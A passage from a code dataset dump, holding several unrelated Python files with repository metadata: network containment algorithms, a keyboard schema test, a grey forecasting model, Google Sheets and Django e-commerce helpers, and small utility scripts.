cherry1 = FindRP2nd(N,x)\n lst1.extend(cherry1)\n lst2 = list()\n while lst1:\n cherry = lst1.pop()\n k = CheckCherry(N, *cherry)\n if (k == 1) or (k == 2):\n ReducePair(N, *cherry)\n lst2.append(cherry)\n lst1.extend(FindRP2nd(N,cherry[1]))\n lst1.extend(FindRP1st(N,cherry[1]))\n return lst2\n\n\n#Algorithm 5\ndef CPSReducesNetwork(N, lst):\n for cherry in lst:\n ReducePair(N, *cherry)\n if N.size() == 1:\n return True\n return False\n\n\n#Algorithm 6\ndef TCNContains(N, M):\n return CPSReducesNetwork(M,FindTCS(N))\n\n \n\n####################################################\n####################################################\n####################################################\n############# #############\n############# MAIN #############\n############# #############\n####################################################\n####################################################\n####################################################\n\n\ntest = open(filename, \"r\")\nline1 = test.read()\nline1 = line1.split(\"\\n\")\ntest.close()\nif edges:\n N = nx.DiGraph()\n M = nx.DiGraph()\n N.add_edges_from(ast.literal_eval(line1[0]))\n M.add_edges_from(ast.literal_eval(line1[1]))\nelse:\n N = Newick_To_Network(line1[0])\n M = Newick_To_Network(line1[1])\n\nstart = time.time()\ncontains = TCNContains(N, M)\nend = time.time()\nrunningTime = end-start;\nprint(\"First network contains second: \"+ str(contains))\nprint(\"Determined in time: \"+ str(runningTime))\n","repo_name":"RemieJanssen/Cherry-picking_TC_Network_Containment","sub_path":"NetworkContainment.py","file_name":"NetworkContainment.py","file_ext":"py","file_size_in_byte":9354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71935635743","text":"import unittest\n\nfrom cros.factory.test.pytests import keyboard\nfrom cros.factory.utils import schema\n\n\nclass KeyboardUnitTest(unittest.TestCase):\n\n def testValidDataWithKeymapSchema(self):\n valid_data = [{\n \"0\": \"1\"\n }, {\n \"0b1\": \"0b1\"\n }, {\n \"0o1\": \"0o1\"\n }, {\n \"0x1\": \"0x1\"\n }]\n for data in valid_data:\n try:\n # pylint: disable=protected-access\n self.assertEqual(None,\n keyboard._REPLACEMENT_KEYMAP_SCHEMA.Validate(data))\n except Exception as err:\n raise Exception('data is not valid: %r' % data) from err\n\n def testInvalidDataWithKeymapSchema(self):\n invalid_data = [{\n \"x\": \"1\"\n }, {\n \"01\": \"1\"\n }, {\n 1: \"1\"\n }, {\n \"1\": \"x\"\n }, {\n \"1\": \"01\"\n }, {\n \"1\": 1\n }]\n for data in invalid_data:\n try:\n # pylint: disable=protected-access\n self.assertRaisesRegex(schema.SchemaException, '^.*$',\n keyboard._REPLACEMENT_KEYMAP_SCHEMA.Validate,\n data)\n except Exception as err:\n raise Exception('data is not invalid: %r' % data) from err\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"arccode/factory","sub_path":"py/test/pytests/keyboard_unittest.py","file_name":"keyboard_unittest.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"20293483117","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 6 22:31:32 2020\n\n@author: LiSunBowen\n\"\"\"\n\nimport numpy as np\nfrom numpy.linalg import *\nimport math\nimport matplotlib.pyplot as plt\ny = np.array(eval(input('请输入数据:'))) # 原始数列 y\npv = eval(input('预测值个数:') or '2')+1\nn = len(y)\nyy = np.ones((n,1))\nyy[0] = y[0]\nfor i in range(1,n):\n yy[i] = yy[i-1] + y[i] # 对原数列y进行累加\nB = np.ones((n-1,2))\nfor i in range(0,n-1):\n B[i][0] = - (yy[i] + yy[i+1])/2 # 对yy做紧邻均值生成\n B[i][1] = 1\n # B为数据矩阵\nBT = B.T\nyn = np.ones((n-1,1))\nfor j in range(0,n-1):\n yn[j] = y[j+1]\nA = np.dot(np.dot(inv(np.dot(BT,B)),BT),yn) # 最小二乘法\na = A[0] # 发展系数\nu = A[1] # 灰作用量\nt = u/a\ni = np.array([i for i in range(n+pv)]) #pv=3\nyys = []\nfor j in range(len(i)):\n yys = (y[0]-t)*np.array([math.exp(-a*j) for j in i])+t # 预测后续数据,也称响应序列\n yys[0] = 1\nyys[0] = y[0] # 后续数据\nys=[i for i in range(n+pv-1)] # 准备好还原数据的列表\nfor j in range(n+pv-2,0,-1):\n ys[j] = yys[j] - yys[j-1] # 对yys做累减还原,生成预测值\nys[0] = y[0]\n\n# 预测完毕,开始检验\nx = [i for i in range(1,n+1)]\nxs = [i for i in range(2,n+pv)]\nyn = ys[1:n+pv] # 截取2至末项\ndet = 0\nsum1 = 0\nsumpe = 0\nfor i in range(n):\n sumpe = sumpe+y[i]\npe = sumpe/n # 原序列均值\nfor i in range(n):\n sum1= sum1+(y[i]-pe)**2 # 原序列方差\ns1 = math.sqrt(sum1/n) # 原序列标准差\nsumce = 0\nh = ys[:len(y)]\neps = h - y\n# 相对残差Q检验\ndelta = abs(eps/y)\nQ = delta.mean()\n# 方差比C检验\nC = eps.std()/y.std()\n# 小误差概率P检验\nS1 = y.std()\ntemp = np.sum((abs(eps-eps.mean()) < 0.6745 * S1) == True)\nP = temp/n\n# 后验差比值检验\nfor i in range(1,n):\n sumce = sumce+(y[i]-yn[i])\nce = sumce/(n-1)\nsum2 = 0;\nfor i in range(1,n):\n sum2 = sum2+(y[i]-yn[i]-ce)**2;\ns2 = math.sqrt(sum2/(n-1))\nc = s2/s1\nprint('\\n>> 残差 Q = {:.5f}'.format(Q))\nprint('>> 方差比 C = {:.5f}'.format(C))\nprint('>> P检验:{:.3f}'.format(P))\nprint('>> 后验差比值 = {:.5f}'.format(c))\nif c < 0.35:\n print('\\n===系统预测精度好!===')\nelif c < 0.5:\n print('===系统预测精度合格!===')\nelif c < 0.65:\n print('===系统预测精度勉强!===')\nelse:\n print('===系统预测精度不合格!===')\nprint('\\n下个拟合值为 %.3f'%ys[n])\nprint('再下个拟合值为 %.3f'%ys[n+1])\nprint('全部拟合值为:\\n',ys[n:])\nplt.plot(x,y,linestyle='',color = 'red',marker='D')\nplt.plot(xs,yn,linestyle='--',color = 'green')\nplt.rcParams['font.sans-serif'] = ['Microsoft YaHei']\nplt.title('灰色预测曲线')\nplt.grid()\nplt.show()\n","repo_name":"Aegis1863/My_mathematical_Modeling","sub_path":"灰色预测/灰色预测.py","file_name":"灰色预测.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"18933357251","text":"from oauth2client.service_account import ServiceAccountCredentials\nimport gspread\nfrom pprint import pprint\nimport pandas as pd\nfrom googleapiclient.discovery import build\n\n\ndef createAccount(keysfile):\n\tscope = [\"https://www.googleapis.com/auth/spreadsheets\", \"https://www.googleapis.com/auth/drive\"]\n\tcredentials = ServiceAccountCredentials.from_json_keyfile_name(keysfile, scope)\n\tservice = build('sheets', 'v4', credentials=credentials)\n\tclient = gspread.authorize(credentials)\n\treturn client, service\n\ndef add_data(keysfile, title, project, data):\n\tclient, service = createAccount(keysfile)\n\tgsheet = client.open(title)\n\tservice.spreadsheets().values().append(\n\t spreadsheetId = gsheet.id,\n\t range = \"{}!A:Z\".format(project),\n\t body = {\n\t\t \"majorDimension\": \"ROWS\",\n\t\t \"values\": data\n\t\t \t},\n\t\t \tvalueInputOption=\"USER_ENTERED\"\n\t\t \t\t).execute()\n\nif __name__ == '__main__':\n\tdata = [\n\t\t\t['user', 'work type', 'hour', 'date'],\n\t\t\t['A', 'A', 'A', 'A'],\n\t\t\t['B', 'B' ,'B' ,'B']\n\t\t\t]\n\tkeysfile = 'D:/scripts/gsheet/key/credentials.json'\n\ttitle = 'Boss' # gsheet name\n\tproject = 'Himmapan' # worksheet name\n\tadd_data(keysfile, title, project, data)","repo_name":"Itsadasomnark/gsheet","sub_path":"add_data_gsheet.py","file_name":"add_data_gsheet.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71878242815","text":"import numpy as np\nfrom scipy import signal\nfrom joblib import Parallel, delayed\n\ndef normalize(data):\n data = data.astype(np.float)\n data -= data.mean()\n print(data.std())\n data /= data.std()\n return data\n\ndef normalize_mat(data):\n return np.array([normalize(v) for v in data])\n\n\nwave_size = 4800\ntrain_traces = np.fromfile('./trace/AES_TI_wave_mask_v4_test', np.uint8)\ntrain_traces = train_traces.reshape(-1, wave_size)\ntrain_traces = np.array(Parallel(n_jobs = 32, verbose=3)([delayed(signal.decimate)(v,2) for v in train_traces]))\nprint(train_traces.shape)\nnp.save(\"./trace/AES_TI_wave_mask_v4_test_down2\",train_traces)","repo_name":"kojima0615/Research_Bachelor","sub_path":"makedata/to_npy.py","file_name":"to_npy.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41355962625","text":"a=int(input((\"Enter total numbers\\n\")))\r\nnums=list(map(int,input().split(\" \")))\r\n'''fir=nums[0]\r\nres=[]\r\ncount=0\r\nfor i in nums:\r\n if(i!=fir):\r\n fir=i\r\n res.append(i)\r\n else:\r\n count+=1\r\n if(count<=1):\r\n res.append(i)\r\nprint(res)\r\n'''\r\nv=set(nums)\r\nprint(list(v))","repo_name":"SpAshish54/Python","sub_path":"duplicates.py","file_name":"duplicates.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33526887096","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport sys\nimport os\n\nfrom sys import argv\n\nINFILE=argv[1]\nTHRESHOLD=int(argv[2])\nTAIL = int(argv[3]) if len(argv) == 4 else None\nFREQ = float(os.environ[\"FREQ\"]) if \"FREQ\" in os.environ else None\n\ndata = []\nrejected = 0\n\nwith open(INFILE, 'r') as f:\n for line in f.readlines():\n if \"fast: \" in line:\n rejected = int(line.split()[1])\n\n else:\n data.append(int(line.strip()))\n\ndata += [THRESHOLD] * rejected\n\nif FREQ is not None:\n data = [d * FREQ / 1000. for d in data]\n\ndef generate_points(tail):\n if tail is not None:\n ps = np.arange(101) * TAIL / 100\n ps = np.array(list(map(lambda n: 100. - 10. ** (2. - n), ps)))\n return ps\n\n else:\n return np.arange(101)\n\nps = generate_points(TAIL)\npercentiles = np.percentile(data, ps)\n\nprint(\"none(%d)\" % len(data), \" \".join(map(lambda p: str(p), percentiles)))\n","repo_name":"multifacet/cbmm-artifact","sub_path":"scripts/bpf-pftrace-percentiles.py","file_name":"bpf-pftrace-percentiles.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"74476833215","text":"from . import models\nfrom adminSide import models as admin_models\nfrom loginSys import models as fk_user_main\nfrom django.contrib.auth.models import User as user_main\nfrom django.core.files.storage import FileSystemStorage\nimport os\nfrom datetime import datetime\nimport requests as rq\nimport base64 as enc\nimport json\n\n# ---------------Reguler def functions -------------------------\ndef get_cat_list():\n\tcategory_list = []\n\tCat = admin_models.category.objects.all()\n\tfor x in range(len(Cat)):\n\t\tcategory_list.append([Cat[x].name, Cat[x].id])\n\treturn category_list\n\ndef get_promo_list(request):\n\tt_promo_list = []\n\tt_promo = models.promo.objects.filter(seller = user_main.objects.get(username = request.user))\n\tfor x in range(len(t_promo)):\n\t\t\tt_promo_list.append([t_promo[x].name, t_promo[x].id])\n\treturn t_promo_list\n\ndef get_promo_cat_list():\n\tcat_promo_list = []\n\tCat_promo = admin_models.promo_type.objects.all()\n\tfor x in range(len(Cat_promo)):\n\t\tcat_promo_list.append([Cat_promo[x].name, Cat_promo[x].id])\n\treturn cat_promo_list\n\ndef upload_img (request):\n\tfile = request.FILES.getlist('img')\n\tfs = FileSystemStorage()\n\t# Mengatasi upload multiple file\n\tfile_name = ''\n\tfor x in range(len(file)):\n\t\t# System upload pada local storage\n\t\t# upload = fs.save(file[x].name, file[x])\n\t\t# name = str(fs.url(upload)).split('/')\n\t\t# file_name += name[2] + '^!@!^'\n\t\t# System upload pada server storage\n\t\t\n\t\tdata = {\"file\":enc.b64encode(file[x].open(\"rb\").read())}\n\t\t# print(data)\n\t\turl = \"https://f-storage.000webhostapp.com/index.php?insert=true&type=png\"\n\t\tresponse = rq.request('POST', url, data = data)\n\t\tif response.status_code == 200 or response.status_code == '200':\n\t\t\tjsonResponse = json.loads(json.dumps(response.json()))\n\t\t\tprint(jsonResponse['filename']+jsonResponse['type'])\n\t\t\ttmpName = jsonResponse['filename']+\".\"+jsonResponse['type']\n\t\t\tfile_name += tmpName + '^!@!^'\n\t\t# print(file[x].open(\"rb\").read())\n\t\t\n\treturn file_name\n\ndef delete_img (request, class_model = models.stuff.objects):\n\tfile_name = request.GET.get('del')\n\t# get nama file di db\n\tif request.GET.get('id') != None :\n\t\tid_stuff = request.GET.get('id')\n\t\t# object untuk digunakan edit data\n\t\tstuff_obj = class_model.get(id = id_stuff)\n\t\tgetFileName = str(stuff_obj.img_file).split('^!@!^')\n\t\tnew_file_name = ''\n\t\tfor x in range(len(getFileName)):\n\t\t\tif str(getFileName[x]) != str(file_name) and str(getFileName[x]) != '':\n\t\t\t\tnew_file_name += getFileName[x]+'^!@!^'\n\t\t\telif str(getFileName[x]) == str(file_name):\n\t\t\t\turl = \"https://f-storage.000webhostapp.com/index.php?delete=\"+getFileName[x]\n\t\t\t\tresponse = rq.request('GET', url)\n\t\t\t\tprint(response.json())\n\t\t\t\t# try:\n\t\t\t\t# \t# dir_name = 'media/'+getFileName[x]\n\t\t\t\t# \t# os.remove(dir_name)\n\n\t\t\t\t# except Exception as e:\n\t\t\t\t# \tprint(e,'\\n')\n\t\tstuff_obj.img_file = new_file_name\n\t\tstuff_obj.save()\n\telse:\n\t\tprint('Gagal menghapus. request tidak sesuai\\n')\n\ndef get_photo_profile(fk_user):\n\tobj = fk_user_main.user_sec.objects.get(fk_id_user = fk_user)\n\treturn obj.Photo\n\n# ------------ untuk kontrol produk view page dan view detail page -------\ndef view_product (request, id_data = 0):\n\tdata_product = ''\n\ttry:\n\t\tif id_data == 0:\n\t\t\tdata_product = models.stuff.objects.filter(seller = request.user)\n\t\telse:\n\t\t\tdata_product = models.stuff.objects.filter(seller = request.user, id = id_data)\n\texcept Exception as e:\n\t\tprint(e,'\\n')\n\t\treturn [], []\n\n\tlistID = []\n\tlistView = []\n\n\tfor x in range(len(data_product)):\n\t\tobj_post = models.products_post.objects.get(stuff_fk = data_product[x])\n\t\tlistID.append(data_product[x].id)\n\t\tID = data_product[x].id\n\t\tname = data_product[x].name\n\t\tdesc = data_product[x].desc\n\t\timg_dir = data_product[x].img_file.split('^!@!^')\n\t\timg_field = data_product[x].img_file\n\t\tstate = data_product[x].state\n\t\tstock = data_product[x].count\n\t\tprice = data_product[x].price\n\t\tlocation = data_product[x].location\n\t\tquality = data_product[x].quality\n\t\t# untuk mendapatkan category\n\t\tcategory = admin_models.category.objects.get(name = data_product[x].stuff_cat).name\n\t\t# unutk dapatkan promo\n\t\tpromo = models.promo.objects.filter(name = data_product[x].stuff_promo)[0].name\n\n\t\ttmp = [ID, name, desc, img_dir, state, stock, price, category, promo, img_field, location, range(0,quality), obj_post.ship_cost, obj_post.note]\n\n\t\t# tmp = [ID, name, desc, img_dir, state, stock, price, category, promo, img_field, location, range(0,quality), obj_post.ship_cost, obj_post.note]\n\n\t\tlistView.append(tmp)\n\n\treturn listView, listID\n\ndef for_modal_choice (request):\n\t# Mendapatkan list option dari table FK untuk addStuff\n\tcategory_list = get_cat_list()\n\tt_promo_list = get_promo_list(request)\n\n\treturn category_list, t_promo_list\n\ndef addStuff (request):\n\tif request.POST.get('add_stuff') != None:\n\t\tname = request.POST['name']\n\t\tstate = request.POST['state']\n\t\tprice = request.POST['price']\n\t\tstock = request.POST['stock']\n\t\tdesc = request.POST['desc']\n\t\tloc = request.POST['location']\n\t\tstuff_cat = admin_models.category.objects.get(id = request.POST['cat'])\n\t\tstuff_promo = models.promo.objects.get(id = request.POST['promo'])\n\t\tseller = user_main.objects.get(username = request.POST['id_seller'])\n\t\tship_cost = request.POST.get('ship_cost')\n\t\tnote = request.POST.get('note')\n\t\t# File type\n\t\timg_dir = upload_img(request)\n\n\t\tif len(img_dir) > 255:\n\t\t\timg_dir = ''\n\n\t\tadd = models.stuff(\n\t\t\tname = name,\n\t\t\tstate = state,\n\t\t\tprice = price,\n\t\t\tcount = stock,\n\t\t\tdesc = desc,\n\t\t\timg_file = img_dir,\n\t\t\tquality = 0,\n\t\t\tlocation = loc,\n\t\t\tstuff_cat = stuff_cat,\n\t\t\tstuff_promo = stuff_promo,\n\t\t\tseller = seller\n\t\t\t)\n\t\tadd.save() \n\n\t\tadd_sec = models.products_post(\n\t\t\tdate = datetime.now().date(),\n\t\t\tnote = note,\n\t\t\tship_cost = ship_cost,\n\t\t\t# FK\n\t\t\tstuff_fk = models.stuff.objects.get(name = name,\n\t\t\t\tstate = state,\n\t\t\t\tprice = price,\n\t\t\t\tcount = stock,\n\t\t\t\tdesc = desc,\n\t\t\t\timg_file = img_dir,\n\t\t\t\tquality = 0,\n\t\t\t\tlocation = loc,\n\t\t\t\tstuff_cat = stuff_cat,\n\t\t\t\tstuff_promo = stuff_promo,\n\t\t\t\tseller = seller)\n\t\t\t)\n\t\tadd_sec.save()\n\n\telse:\n\t\tprint('Tidak ada request add_stuff')\n\ndef editStuff (request):\n\tif request.POST.get('edit_stuff') != None:\n\t\tid_stuff = request.POST['id']\n\t\tname1 = request.POST['name']\n\t\tstate1 = request.POST['state']\n\t\tprice1 = request.POST['price']\n\t\tstock1 = request.POST['stock']\n\t\tdesc1 = request.POST['desc']\n\t\tloc1 = request.POST['location']\n\t\tstuff_cat1 = admin_models.category.objects.get(id = request.POST['cat'])\n\t\tstuff_promo1 = models.promo.objects.get(id = request.POST['promo'])\n\t\tseller1 = user_main.objects.get(username = request.POST['id_seller'])\n\n\t\tstuff_obj = models.stuff.objects.get(seller = user_main.objects.get(username = request.user), id = id_stuff)\n\t\t\n\t\t# id_post = request.POST.get('id_sec')\n\t\tship_cost = request.POST.get('ship_cost')\n\t\tnote = request.POST.get('note')\n\n\t\tpost_obj = models.products_post.objects.get(stuff_fk = stuff_obj)\n\n\t\tif len(request.FILES.getlist('img')) != 0 :\n\t\t\tprint('Ono gambar e broo !!!\\n')\n\t\t\tprev_img = stuff_obj.img_file\n\t\t\timg_dir = upload_img(request)\n\n\t\t\timg_dir = img_dir + prev_img\n\n\t\t\tif len(img_dir) > 255:\n\t\t\t\timg_dir = prev_img\n\n\t\t\tstuff_obj.name = name1\n\t\t\tstuff_obj.state = state1\n\t\t\tstuff_obj.price = price1\n\t\t\tstuff_obj.count = stock1\n\t\t\tstuff_obj.desc = desc1\n\t\t\tstuff_obj.img_file = img_dir\n\t\t\tstuff_obj.location = loc1\n\t\t\tstuff_obj.stuff_cat = stuff_cat1\n\t\t\tstuff_obj.stuff_promo = stuff_promo1\n\t\t\tstuff_obj.seller = seller1\n\n\t\t\tstuff_obj.save()\n\n\t\t\tpost_obj.note = note\n\t\t\tpost_obj.ship_cost = ship_cost\n\n\t\t\tpost_obj.save()\n\n\t\telse:\n\t\t\tprint('Gak ono gambar e broo !!!\\n')\n\t\t\tstuff_obj.name = name1\n\t\t\tprint(name1,'\\n')\n\t\t\tstuff_obj.state = state1\n\t\t\tstuff_obj.price = price1\n\t\t\tstuff_obj.count = stock1\n\t\t\tstuff_obj.desc = desc1\n\t\t\tstuff_obj.location = loc1\n\t\t\tstuff_obj.stuff_cat = stuff_cat1\n\t\t\tstuff_obj.stuff_promo = stuff_promo1\n\t\t\tstuff_obj.seller = seller1\n\n\t\t\tstuff_obj.save()\n\n\t\t\tpost_obj.note = note\n\t\t\tpost_obj.ship_cost = ship_cost\n\n\t\t\tpost_obj.save()\n\n\telse:\n\t\tprint('Tidak ada request edit\\n')\n\ndef del_stuff_data(request):\n\tconfirm = True\n\tif request.GET.get('del_data') != None:\n\t\tdel_data = ''\n\t\ttry:\n\t\t\tdel_data = models.stuff.objects.get(id = request.GET.get('del_data'))\n\t\t\t# del_data_sec = models.products_post.objects.get(stuff_fk = del_data)\n\t\texcept Exception as e:\n\t\t\tprint(e,'\\n')\n\t\t\tconfirm = False\n\n\t\tif confirm == True:\n\t\t\t# img = del_data.img_file\n\t\t\t# img = str(img).split('^!@!^')\n\t\t\t# for x in range(len(img)):\n\t\t\t# \tif img[x] != '':\n\t\t\t# \t\ttry:\n\t\t\t# \t\t\tos.remove('media/'+img[x])\n\t\t\t# \t\texcept Exception as e:\n\t\t\t# \t\t\tprint(e,'\\n')\n\t\t\t# del_data_sec.delete()\n\t\t\t# del_data.delete()\n\t\t\tdel_data.state = 'deactive'\n\t\t\tdel_data.save()\n\t\treturn confirm\n\n\telse:\n\t\tprint('Tidak ada request HAPUS\\n')\n\t\treturn confirm\n\n# ------------------ KOntrol view promo dan edit promo ------------------\ndef view_promos(request, id_data = 0):\n\tdata_promos = ''\n\tlist_view = []\n\tif id_data == 0:\n\t\tdata_promos = models.promo.objects.filter(seller = request.user)\n\telse :\n\t\tdata_promos = models.promo.objects.filter(seller = request.user, id = id_data)\n\n\tfor x in range(len(data_promos)):\n\t\tID = data_promos[x].id\n\t\tname = data_promos[x].name\n\t\tstart_prm = str(data_promos[x].start_date)\n\t\tend_prm = str(data_promos[x].end_date)\n\t\tdesc = data_promos[x].desc\n\t\tval_prm = data_promos[x].value\n\t\tprm_type = data_promos[x].promo_type\n\t\tprm_icon = ''\n\n\t\tif prm_type.name == 'No Promo':\n\t\t\tprm_icon = 'img/no_promo.png'\n\t\telif prm_type.name == 'gratis_ongkir':\n\t\t\tprm_icon = 'img/ongkir-gratis.png'\n\t\telif prm_type.name == 'voucher_discount':\n\t\t\tprm_icon = 'img/voucher_dc.png'\n\t\telif prm_type.name == 'voucher_cashback':\n\t\t\tprm_icon = 'img/cashback.png'\n\t\t# print(prm_type.name)\n\t\ttmp = [ID, name, start_prm, end_prm, desc, val_prm, prm_type, prm_icon]\n\t\tlist_view.append(tmp)\n\n\treturn list_view\n\ndef add_promo(request):\n\tif request.POST.get('add_promo') != None:\n\t\tname = request.POST.get('name')\n\t\tst_date = request.POST.get('st')\n\t\tend = request.POST.get('end')\n\t\tdesc = request.POST.get('desc')\n\t\tval = request.POST.get('val')\n\t\tprm_type = admin_models.promo_type.objects.get(id = request.POST.get('tp_prm'))\n\t\tseller = user_main.objects.get(username = request.user)\n\n\t\tadd = models.promo(\n\t\t\tname = name,\n\t\t\tstart_date = st_date,\n\t\t\tend_date = end,\n\t\t\tdesc = desc,\n\t\t\tvalue = val,\n\t\t\tpromo_type = prm_type,\n\t\t\tseller = seller,\n\t\t\t)\n\t\tadd.save()\n\telse:\n\t\tprint('Tidak ada request POST add promo\\n') \n\ndef edit_promo(request):\n\tif request.POST.get('edit_promo') != None:\n\t\tID = request.POST.get('id')\n\t\tname = request.POST.get('name')\n\t\tst_date = request.POST.get('st')\n\t\tend = request.POST.get('end')\n\t\tdesc = request.POST.get('desc')\n\t\tval = request.POST.get('val')\n\t\tprm_type = admin_models.promo_type.objects.get(id = request.POST.get('tp_prm'))\n\t\tseller = user_main.objects.get(username = request.user)\t\t\n\n\t\tedit = models.promo.objects.get(seller = user_main.objects.get(username = request.user), id = ID)\n\n\t\tedit.name = name\n\t\tedit.start_date = st_date\n\t\tedit.end_date = end\n\t\tedit.desc = desc\n\t\tedit.value = val\n\t\tedit.promo_type = prm_type\n\t\tedit.seller = seller\n\n\t\tedit.save()\n\telse:\n\t\tprint('Tidak ada request EDIt data\\n')\n\ndef del_promo_data(request):\n\tconfirm = True\n\tif request.GET.get('del_data') != None:\n\t\tdel_data = ''\n\t\ttry:\n\t\t\tdel_data = models.promo.objects.get(id = request.GET.get('del_data'))\n\t\texcept Exception as e:\n\t\t\tprint(e,'\\n')\n\t\t\tconfirm = False\n\n\t\tif confirm == True:\n\t\t\tdel_data.delete()\n\t\treturn confirm\n\telse:\n\t\tprint('Tidak ada request HAPUS\\n')\n\t\treturn confirm\n\n\n# -------------- Kontrol untuk selling barang oleh seller -------------\ndef view_selling(List_ID):\n\tlist_view = []\n\tfor x in range(len(List_ID)):\n\t\t# stuff_obj = models.stuff.objects.get(id = List_ID[x])\n\t\tobj = models.selling.objects.filter(name_stuff = models.stuff.objects.get(id = List_ID[x]))\n\t\ttmp = []\n\t\tfor y in range(len(obj)):\n\t\t\ttmp.append(\n\t\t\t\t\t[str(obj[y].date), obj[y].pay_value, obj[y].count, obj[y].ship_cost,\n\t\t\t\t\tobj[y].pay_method, obj[y].buyer.username, obj[y].buyer, obj[y].id]\n\t\t\t\t)\n\t\tlist_view.append(tmp)\n\treturn list_view\n\n# -------- Kontrol untuk get /view profit per tahun ------------\ndef create_view_all(ID_Stuff):\n\tall_saldo = []\n\tfor x in range(len(ID_Stuff)):\n\t\tobj_sell = models.selling.objects.filter(\n\t\t\tname_stuff = models.stuff.objects.get(id = ID_Stuff[x]))\n\t\tfor y in range(len(obj_sell)):\n\t\t\tobj_saldo = models.profit.objects.get(sell_code = obj_sell[y])\n\t\t\tall_saldo.append(obj_saldo)\n\treturn all_saldo\n\ndef create_view_graph(list_sells):\n\tlist_saldo = []\n\tfor x in range(len(list_sells)):\n\t\ttry:\n\t\t\tlist_saldo.append(models.profit.objects.get(sell_code = list_sells[x][2]))\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\tprint(list_saldo)\n\tprint(datetime.today().date())\n\tyear_now = str(datetime.today().date()).split('-')[0]\n\tview = ['']*12\n\tmonth = ''\n\tfor x in range(len(list_saldo)):\n\t\tdate = str(list_saldo[x].date).split('-')\n\n\t\tif date[0] == year_now:\n\t\t\t# view.append(list_saldo[x])\n\t\t\tif x == 0:\n\t\t\t\tmonth = date[1]\n\t\t\t\tview[int(month)-1] = list_saldo[x].profit_sell\n\t\t\telif x > 0 and date[1] == month:\n\t\t\t\tview[int(month)-1] += list_saldo[x].profit_sell\n\t\t\telif x > 0 and date[1] != month:\n\t\t\t\tview[int(month)-1] = list_saldo[x].profit_sell\n\t\t\t\tmonth = date[1]\n\tprint(view)\n\treturn view\n\ndef selling_list(request):\n\tpass\n\t# ambil data semua barang yang ada di penjual\n\tstuffs = models.stuff.objects.filter(seller = request.user)\n\t# Ambil semua cart terkait barang itu\n\tcarts = []\n\tfor x in range(len(stuffs)):\n\t\tcarts += models.cart.objects.filter(stuff = stuffs[x]).order_by('date')\n\t# Hubungan 1 to 1 dengan selling data\n\t# carts.order_by('id')\n\tcarts.sort(reverse = True, key=lambda carts: carts.id)\n\t# print(carts)\n\ttrxs = []\n\tsells_prd = []\n\tsells_finish = []\n\tfor x in range(len(carts)):\n\t\ttry:\n\t\t\ttrxs.append(models.selling.objects.get(cart_ordered = carts[x]).trx_id)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\n\t# Dapatkan list trx beserta jumlah tip trx nya\n\ttrxs_id = {i:trxs.count(i) for i in trxs}\n\ttrx_ids = list(trxs_id.keys())\n\tcount_trx_ids = list(trxs_id.values())\n\t# Ambil data selling setiap transaksi\n\tfor x in range(len(trx_ids)):\n\t\tsells = models.selling.objects.filter(trx_id = trx_ids[x])\n\t\t# 1 sells punya 1 produk\n\t\tprd_in_sell = []\n\t\tfor y in range(len(sells)):\n\t\t\tprd_in_sell.append(sells[y].cart_ordered.stuff.id)\n\n\t\ttmp_prd = {i:prd_in_sell.count(i) for i in prd_in_sell}\n\t\tprd_ids = list(tmp_prd.keys())\n\t\tcount_prd_ids = list(tmp_prd.values())\n\t\t# print(prd_in_sell, trx_ids[x])\n\t\t# Looping menentukan status order\n\t\tstates_order = []\n\t\tfor y in range(len(prd_ids)):\n\t\t\tstate_order = ''\n\t\t\tfor z in range(len(sells)):\n\t\t\t\tif str(prd_ids[y]) == str(sells[z].cart_ordered.stuff.id):\n\t\t\t\t\tstate_order = sells[z].cart_ordered.state_order\n\t\t\t# print(state_order, trx_code[x])\n\t\t\tstates_order.append(state_order)\n\n\t\ttmp_stuff = []\n\t\ttmp_finish = []\n\t\tfor y in range(len(prd_ids)):\n\t\t\tobj_prd = models.stuff.objects.get(id = prd_ids[y])\n\t\t\tobj_post = models.products_post.objects.get(stuff_fk = obj_prd)\n\t\t\ttmp_stuff.append([obj_prd, obj_post, obj_prd.img_file.split('^!@!^')[0], count_prd_ids[y], states_order[y]])\n\t\t\t# print(tmp_stuff, x)\n\t\t\tif states_order[y] == 'finish':\n\t\t\t\ttmp_finish.append([obj_prd, obj_post, obj_prd.img_file.split('^!@!^')[0], count_prd_ids[y], states_order[y]])\n\n\t\tdetail_buyer = fk_user_main.user_sec.objects.get(fk_id_user = sells[0].buyer)\n\n\t\tsells_prd.append([trx_ids[x], tmp_stuff, sells[0], detail_buyer])\n\t\tsells_finish.append([trx_ids[x], tmp_finish, sells[0], detail_buyer])\n\n\t# print(sells_prd)\n\treturn sells_prd, trx_ids, sells_finish\n\n\t\n\n\n\n\n\n\n\n\n","repo_name":"SyaifudinRamadhan/online-shop","sub_path":"sellerSide/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":15517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14818668783","text":"import datetime\nfrom pprint import pprint\n\nfrom googleapiclient.discovery import build\nfrom yaml_file_types import Haiku\n\nSPREADSHEET_ID = '163TTTMqbu_og6vOaRie8X-LGADXw-xZ904SU9ypDr38'\nRANGE_NAME = 'Haiku!A2:D'\n\ndef fetch_haiku(api_key):\n \"\"\"Obtains Haiku objects from the haiku spreadsheet\"\"\"\n rows = download_rows(api_key)\n return process_rows(rows)\n\ndef 